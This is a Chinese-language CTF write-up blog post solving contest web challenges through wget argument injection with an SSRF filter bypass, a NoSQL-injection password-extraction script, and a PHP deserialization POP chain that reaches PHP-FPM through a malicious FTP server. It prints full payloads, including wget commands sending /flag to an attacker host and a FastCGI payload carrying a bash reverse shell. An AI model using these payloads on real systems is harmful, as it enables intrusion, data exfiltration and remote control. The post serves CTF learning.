<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39696665/article/details/110465937"> -bash: wget: 未找到命令_利用命令注入外带数据的一些姿势_weixin_39696665的博客-CSDN博客</a></p>
<h3 id="一-直接使用wget"><a href="#一-直接使用wget" class="headerlink" title="一.直接使用wget"></a>一.直接使用wget</h3><p>这里我们就利用了<code>–post-file</code>实现对flag文件上传到我们自己服务器上的操作<code>wget --post-file /flag http://ip:port</code></p>
<p>因为根据代码</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220512231220147.png" alt="image-20220512231220147"></p>
<p>可以看到这是从数组第二个开始取，所以第一个是什么都无所谓，我们要构造的payload要从第二个开始</p>
<p>payload</p>
<p><code>/wget?argv=1&amp;argv=--post-file&amp;argv=/flag&amp;argv=http://ip:port/</code></p>
<p>在就相当于将/flag里的内容上传到我们服务器的这个端口上，只要我们在服务器上监听这个端口，就能看到上传的内容</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220512230723967.png" alt="image-20220512230723967"></p>
<h3 id="二-使用proxy进行ssrf"><a href="#二-使用proxy进行ssrf" class="headerlink" title="二.使用proxy进行ssrf"></a>二.使用proxy进行ssrf</h3><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220512231839155.png" alt="image-20220512231839155"></p>
<p>在这里我们看到不仅仅是<code>--post-file</code>可以传输文件，<code>--body-file</code>同样可以，只是需要指定method</p>
<p>所以<code>/wget?argv=2&amp;argv=--body-file&amp;argv=/flag&amp;argv=--method=POST&amp;argv=http://ip:port/</code>同样可以</p>
<p>当然这个不是我们的ssrf</p>
<p>ssrf在/proxy路由里</p>
<pre class="language-go" data-language="go"><code class="language-go">func proxyController(c *gin.Context) &#123;
    
    var url Url
    if err :&#x3D; c.ShouldBindJSON(&amp;url); err !&#x3D; nil &#123;
        c.JSON(500, gin.H&#123;&quot;msg&quot;: err&#125;)
        return
    &#125;
    
    re :&#x3D; regexp.MustCompile(&quot;127.0.0.1|0.0.0.0|06433|0x|0177|localhost|ffff&quot;)
    if re.MatchString(url.Url) &#123;
        c.JSON(403, gin.H&#123;&quot;msg&quot;: &quot;Url Forbidden&quot;&#125;)
        return
    &#125;
    
    client :&#x3D; &amp;http.Client&#123;Timeout: 2 * time.Second&#125;

    resp, err :&#x3D; client.Get(url.Url)
    if err !&#x3D; nil &#123;
        c.JSON(http.StatusInternalServerError, gin.H&#123;&quot;error&quot;: err.Error()&#125;)
        return
    &#125;
    defer resp.Body.Close()
    var buffer [512]byte
    result :&#x3D; bytes.NewBuffer(nil)
    for &#123;
        n, err :&#x3D; resp.Body.Read(buffer[0:])
        result.Write(buffer[0:n])
        if err !&#x3D; nil &amp;&amp; err &#x3D;&#x3D; io.EOF &#123;

            break
        &#125; else if err !&#x3D; nil &#123;
            c.JSON(http.StatusInternalServerError, gin.H&#123;&quot;error&quot;: err.Error()&#125;)
            return
        &#125;
    &#125;
    c.JSON(http.StatusOK, gin.H&#123;&quot;data&quot;: result.String()&#125;)
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220512232424874.png" alt="image-20220512232424874"></p>
<p>这块一看就像为了防止ssrf才写出来的，（虽然我没看出来ssrf漏洞在哪，在我看来这还是利用了wget</p>
<p>但是我们可以用<code>[::]</code>绕过对127.0.0.1的限制然后访问内网</p>
<p>并且wget路由可以用来发送请求，那么就可以传入恶意的参数来获取服务器上文件并且外带出来，最终的payload（注意post发包改为application/json格式）</p>
<p>payload</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">&#123;&quot;url&quot;:&quot;http:&#x2F;&#x2F;[::]:8080&#x2F;wget?argv&#x3D;-e+http_proxy&#x3D;http:&#x2F;&#x2F;ip:port&amp;argv&#x3D;--method&#x3D;POST&amp;argv&#x3D;--body-file&#x3D;&#x2F;flag&amp;argv&#x3D;http:&#x2F;&#x2F;ip:port&quot;&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220512232841863.png" alt="image-20220512232841863"></p>
<p>小tips：</p>
<p>这个payload里<code>-e &quot;http_proxy=porxyhost:port&quot;</code>这部分是利用<code>wget -e &quot;http_proxy=porxyhost:port&quot; www.baidu.com</code>的形式获得代理设置的命令，但实际上根本用不到，因为argv参数从第二个开始取</p>
<p>顺带提一下如果是curl命令就要用<code>curl -x proxyhost:port www.baidu.com</code>这种形式</p>
<h3 id="三-nosql注入"><a href="#三-nosql注入" class="headerlink" title="三.nosql注入"></a>三.nosql注入</h3><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220513122251311.png" alt="image-20220513122251311"></p>
<p>这里存在nosql注入</p>
<p>所以可以根据这个获取admin的密码，脚本如下：</p>
<p>脚本中使用//将该行之后的代码进行注释，并且通过补全代码使得代码完整<br>代码中判断是否成功用的是Pretend字符串，根据源码，如果用户名名称和密码判断不正确，就会返回含有Pretend的字符串</p>
<pre class="language-python" data-language="python"><code class="language-python">import requests

url &#x3D; &quot;http:&#x2F;&#x2F;47.117.125.220:8081&#x2F;login&quot;#自行修改

headers &#x3D; &#123;
    &quot;Content-Type&quot;: &quot;application&#x2F;x-www-form-urlencoded&quot;
&#125;

strings &#x3D; &quot;1234567890abcdefghijklmnopqrstuvwxyz&quot;

res &#x3D; &quot;&quot;
#res长度从0开始
for i in range(len(res) + 1, 40):
    if len(res) &#x3D;&#x3D; i - 1:
        for c in strings:
            data &#x3D; &#123;
                #注意这个substr用的是-号，是反向读取密码的，反向逐个读取密码，然后对比
                &quot;username&quot;: &quot;admin&#39;&amp;&amp;this.password.substr(-&quot; + str(i) + &quot;)&#x3D;&#x3D;&#39;&quot; + str(c + res) + &quot;&#39;) &#123;return true;&#125;&#125;)&#x2F;&#x2F;&quot;,
                &quot;password&quot;: &quot;123456&quot;
            &#125;
            r &#x3D; requests.post(url&#x3D;url, headers&#x3D;headers, data&#x3D;data)
            if &quot;Pretend&quot; in r.text:
                res &#x3D; c + res
                print(&quot;[+] &quot; + res)
                break
    else:
        print(&quot;[-] Failed&quot;)
        break
</code></pre>

<p>不过没啥用，就算是admin登录了也没flag</p>
<h2 id="eaaasyphp"><a href="#eaaasyphp" class="headerlink" title="eaaasyphp"></a>eaaasyphp</h2><pre class="language-php" data-language="php"><code class="language-php">&lt;?php

class Check &#123;
    public static $str1 &#x3D; false;
    public static $str2 &#x3D; false;
&#125;


class Esle &#123;
    public function __wakeup()
    &#123;
        Check::$str1 &#x3D; true;
    &#125;
&#125;


class Hint &#123;

    public function __wakeup()&#123;
        $this-&gt;hint &#x3D; &quot;no hint&quot;;
    &#125;

    public function __destruct()&#123;
        if(!$this-&gt;hint)&#123;
            $this-&gt;hint &#x3D; &quot;phpinfo&quot;;
            ($this-&gt;hint)();
        &#125;  
    &#125;
&#125;


class Bunny &#123;

    public function __toString()
    &#123;
        if (Check::$str2) &#123;
            if(!$this-&gt;data)&#123;
                $this-&gt;data &#x3D; $_REQUEST[&#39;data&#39;];
            &#125;
            file_put_contents($this-&gt;filename, $this-&gt;data);
        &#125; else &#123;
            throw new Error(&quot;Error&quot;);
        &#125;
    &#125;
&#125;

class Welcome &#123;
    public function __invoke()
    &#123;
        Check::$str2 &#x3D; true;
        return &quot;Welcome&quot; . $this-&gt;username;
    &#125;
&#125;

class Bypass &#123;

    public function __destruct()
    &#123;
        if (Check::$str1) &#123;
            ($this-&gt;str4)();
        &#125; else &#123;
            throw new Error(&quot;Error&quot;);
        &#125;
    &#125;
&#125;

if (isset($_GET[&#39;code&#39;])) &#123;
    unserialize($_GET[&#39;code&#39;]);
&#125; else &#123;
    highlight_file(__FILE__);
&#125;</code></pre>

<p>这里有file_put_contents，文件名和内容都可控，可以试试写马，但是这里做了权限控制，写不了</p>
<p>然后看到有hint类，里面能访问phpinfo尝试去反序列化执行这个类，绕过wakeup我们采用常用的修改方式</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">O:4:&quot;Hint&quot;:0:&#123;&#125;&#x3D;&gt;O:4:&quot;Hint&quot;:1:&#123;&#125;</code></pre>

<p>发现并没有执行，因为wakeup的绕过在高版本被修复了，这里官方给了一个很有意思的绕过<a target="_blank" rel="noopener" href="https://bugs.php.net/bug.php?id=81151">https://bugs.php.net/bug.php?id=81151</a></p>
<p>将O改成C就能成功绕过，访问phpinfo，改成负数好像也可以</p>
<p>除此之外还可以利用bypass类来访问phpinfo</p>
<pre class="language-php" data-language="php"><code class="language-php">class Bypass &#123;
    public function __construct()
    &#123;
        $this-&gt;test &#x3D; new Esle();
        $this-&gt;str4 &#x3D; &#39;phpinfo&#39;;
    &#125;
&#125;

$a &#x3D; new Bypass();
echo serialize($a);</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220513124945406.png" alt="image-20220513124945406"></p>
<p>在phpinfo里发现</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220513125309445.png" alt="image-20220513125309445"></p>
<p>那应该就是利用ftp(文件传输协议)的被动模式打php-fpm9000端口了</p>
<h3 id="FTP的被动模式打php-fpm"><a href="#FTP的被动模式打php-fpm" class="headerlink" title="FTP的被动模式打php-fpm"></a>FTP的被动模式打php-fpm</h3><p>FTP 协议的被动模式：客户端试图从FTP服务器上读取/写入一个文件，服务器会通知客户端将文件的内容读取到一个指定的IP和端口上，我们可以指定到127.0.0.1:9000，这样就可以向目标主机本地的 PHP-FPM 发送一个任意的数据包，从而执行代码，造成SSRF</p>
<p>原理：</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220513131104286.png" alt="image-20220513131104286"></p>
<p>这里要先在vps上搭一个恶意的ftp服务</p>
<pre class="language-python" data-language="python"><code class="language-python"># evil_ftp.py
import socket
s &#x3D; socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind((&#39;0.0.0.0&#39;, 5002))
s.listen(1)
conn, addr &#x3D; s.accept()
conn.send(b&#39;220 welcome\n&#39;)
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b&#39;331 Please specify the password.\n&#39;)
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b&#39;230 Login successful.\n&#39;)
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b&#39;200 Switching to Binary mode.\n&#39;)
#Size &#x2F;
conn.send(b&#39;550 Could not get the file size.\n&#39;)
#EPSV (1)
conn.send(b&#39;150 ok\n&#39;)
#PASV
conn.send(b&#39;227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n&#39;) #STOR &#x2F; (2)
conn.send(b&#39;150 Permission denied.\n&#39;)
#QUIT
conn.send(b&#39;221 Goodbye.\n&#39;)
conn.close()</code></pre>

<p>然后利用gopherus生成打fastcgi的payload</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220513135948923.png" alt="image-20220513135948923"></p>
<p>我们只要9000/_后边的部分</p>
<p>最后就是构造pop链调用file_put_contents</p>
<p>这里有几个魔术方法</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">__wakeup():当调用unserialize时触发
__toString():当类被当作字符串时调用
__invoke():当把类当作函数处理时调用</code></pre>

<p>pop链</p>
<pre class="language-php" data-language="php"><code class="language-php">class Check &#123;
    public static $str1 &#x3D; ture;
    public static $str2 &#x3D; &#39;phpinfo&#39;;
&#125;

class Esle &#123;
    public function __wakeup()
    &#123;
        Check::$str1 &#x3D; true;
    &#125;
&#125;


class Hint &#123;

    public function __wakeup()&#123;
        $this-&gt;hint &#x3D; &quot;no hint&quot;;
    &#125;

    public function __destruct()&#123;
        if(!$this-&gt;hint)&#123;
            $this-&gt;hint &#x3D; &quot;phpinfo&quot;;
            ($this-&gt;hint)();
        &#125;
    &#125;
&#125;

class Bunny &#123;
    public function __construct()&#123;
        $this-&gt;filename &#x3D;&#39;ftp:&#x2F;&#x2F;aaa@ip:5002&#x2F;123&#39;;#这里的端口号要和ftp的服务里的端口号一样
    &#125;
    public function __toString(): string
    &#123;
        if (Check::$str2) &#123;
            if(!$this-&gt;data)&#123;
                $this-&gt;data &#x3D; $_REQUEST[&#39;data&#39;];
            &#125;
            file_put_contents($this-&gt;filename, $this-&gt;data);
        &#125; else &#123;
            throw new Error(&quot;Error&quot;);
        &#125;
        return &#39;1&#39;;
    &#125;
&#125;

class Welcome &#123;
    public function __construct()&#123;
        $this-&gt;username &#x3D; new Bunny();
    &#125;
    public function __invoke(): string
    &#123;
        Check::$str2 &#x3D; true;
        return &quot;Welcome&quot; . $this-&gt;username;
    &#125;
&#125;

class Bypass &#123;
    public function __construct()
    &#123;
        $this -&gt; test &#x3D; new Esle();
        $this -&gt;str4 &#x3D; new Welcome();
    &#125;


    public function __destruct()
    &#123;
        if (Check::$str1) &#123;
            ($this-&gt;str4)();
        &#125; else &#123;
            throw new Error(&quot;Error&quot;);
        &#125;
    &#125;
&#125;

$a &#x3D; new Bypass();
echo urlencode(serialize($a));</code></pre>

<p>最终构造的payload为</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">code&#x3D;O%3A6%3A%22Bypass%22%3A2%3A%7Bs%3A4%3A%22test%22%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Ds%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A33%3A%22ftp%3A%2F%2Faaa%40117.XX.XXX.XXX%3A5002%2F123%22%3B%7D%7D%7D&amp;data&#x3D;%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20&#x2F;%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP&#x2F;1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A&#x2F;&#x2F;input%0F%17SCRIPT_FILENAME&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php%0D%01DOCUMENT_ROOT&#x2F;%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20&#x2F;dev&#x2F;tcp&#x2F;117.XX.XXX.XXX&#x2F;5001%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9/image-20220513135416159.png" alt="image-20220513135416159"></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Ethe</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://Ethe448.github.io/2022/05/12/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9%E5%A4%8D%E7%8E%B0/">https://Ethe448.github.io/2022/05/12/%E9%99%87%E5%8E%9F%E6%88%98%E5%BD%B9%E5%A4%8D%E7%8E%B0/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Ethe</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/ctf/">
                                    <span class="chip bg-color">ctf</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: '9uxoX9BlIsmwlt8gNkGLF9Ow-gzGzoHsz',
        appKey: 'rrsgRW80sgJP9PdFwFycskT9',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '8',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

<!--酷Q推送-->


    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2022/05/20/520%E8%BF%8E%E6%96%B0%E8%B5%9Bwp/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="dest0g3 520迎新赛wp">
                        
                        <span class="card-title">dest0g3 520迎新赛wp</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-05-20
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf/">
                        <span class="chip bg-color">ctf</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/04/26/ssrf/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/16.jpg" class="responsive-img" alt="ssrf">
                        
                        <span class="card-title">ssrf</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-04-26
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                        <span class="chip bg-color">web学习</span>
                    </a>
                    
                    <a href="/tags/ssrf/">
                        <span class="chip bg-color">ssrf</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
$(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
